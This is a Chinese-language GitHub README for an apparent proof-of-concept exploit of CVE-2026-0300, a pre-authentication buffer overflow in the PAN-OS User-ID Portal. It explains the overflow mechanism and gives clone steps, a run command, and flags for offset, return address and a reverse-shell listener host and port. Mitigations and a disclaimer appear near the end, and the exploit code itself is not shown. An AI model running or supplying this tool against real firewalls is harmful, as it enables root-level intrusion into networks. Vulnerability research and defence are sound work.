p3Nt3st3r-sTAr/CVE-2026-0300-POC

GitHub: p3Nt3st3r-sTAr/CVE-2026-0300-POC

该仓库提供了 PAN-OS User-ID Portal 缓冲区溢出漏洞 CVE-2026-0300 的概念验证,演示未认证远程 root RCE 的利用过程。

Stars: 3 | Forks: 4

# 🛡️ CVE-2026-0300:PAN-OS User-ID™ Portal RCE 分析 ### **研究概念验证:CWE-787 越界写入** ![安全](https://img.shields.io/badge/Security-Critical-red) ![Python](https://img.shields.io/badge/Python-3.x-blue) ![许可证](https://img.shields.io/badge/License-MIT-green) ![依赖项](https://img.shields.io/badge/Dependencies-None-brightgreen) ## 📌 概述 **CVE-2026-0300** 是在 **Palo Alto Networks PAN-OS** User-ID™ Authentication Portal (Captive Portal) 中发现的一个高危缓冲区溢出漏洞。本研究的代码仓库演示了该漏洞的技术原理,重点说明了未经验证的网络数据包如何导致以 root 权限进行**远程代码执行 (RCE)**。 ## 📊 漏洞详情 | 特征 | 详情 | | :--- | :--- | | **CVE ID** | CVE-2026-0300 | | **严重性评分** | 9.3 (严重) | | **弱点类型** | CWE-787: 越界写入 | | **攻击向量** | 网络 (未经验证) | | **所需权限** | 无 | | **用户交互** | 无 | | **受影响软件** | PAN-OS 12.1, 11.2, 11.1, 10.2 | ## 🔬 技术机制 该漏洞发生在 User-ID Authentication Portal 服务将数据写入内存缓冲区之前,未能验证传入数据长度的情况下。 1. **缓冲区:** 服务会分配一块固定大小的内存区域来处理 Portal 请求。 2. **溢出:** 特制的 POST 请求会发送超过此大小的 payload。 3. **覆盖:** 多余的数据会覆盖栈/堆,使攻击者能够控制**指令指针 (EIP/RIP)** 并执行任意的 shellcode。 ## 🛠️ 安装与设置 ### **1. 前置条件** * Python 3.9 或更高版本。 * **无需外部库** (使用标准库 `socket`、`struct` 和 `argparse`)。 ### **2. 克隆研究工具** # 克隆代码仓库 ``` git clone https://github.com/p3Nt3st3r-sTAr/CVE-2026-0300-POC.git ``` # 进入目录 ``` cd CVE-2026-0300-POC ``` # 赋予脚本执行权限 ``` chmod +x research_poc.py ``` ## 🚀 使用指南 本工具配备了专业的 CLI (命令行界面)。 ### **基础命令** ``` python3 research_poc.py -t --lhost -L ``` ### **高级参数** | 标志 | 名称 | 描述 | 默认值 | |---|---|---|---| | -t | --target | **(必填)** 防火墙的目标 IP 地址。 | 无 | | -p | --port | 运行 User-ID Portal 的端口。 | 6082 | | -o | --offset | 达到内存溢出点的字节长度。 | 2048 | | -r | --ret | 十六进制返回地址。 | 0xdeadbeef | | -l | --lhost | 反向 shell 的 IP 地址 | 你的 IP | | -L | --lport | 你的监听端口 | 4444 | ## 🛡️ 缓解措施与安全建议 * **更新 PAN-OS:** 安装最新的安全补丁(于 2026 年 5 月发布)。 * **IP 限制:** 将 Portal 访问权限限制为受信任的内部 IP 区域。 * **禁用 Portal:** 如果不需要 User-ID Authentication,请禁用该功能。 ## ⚠️ 道德与法律免责声明 **仅供教育和授权研究使用。** 对您不拥有的系统进行未经授权的测试是非法的。作者不对本研究代码的任何滥用行为负责。请负责任地使用,以提升全球网络安全。 **开发者:** https://t.me/p3Nt3st3rsTAr **漏洞发现日期:** 2026 年 5 月 7 日
标签:0day, Captive Portal, CISA项目, CVE-2026-0300, CWE-787, Palo Alto Networks, PAN-OS, PoC, Python, RCE, Root权限, Socket编程, User-ID Portal, Web报告查看器, 情报收集, 提权, 数据展示, 无后门, 暴力破解, 漏洞研究, 红队, 缓冲区溢出, 编程工具, 网络安全, 认证绕过, 越界写入, 远程代码执行, 逆向工具, 隐私保护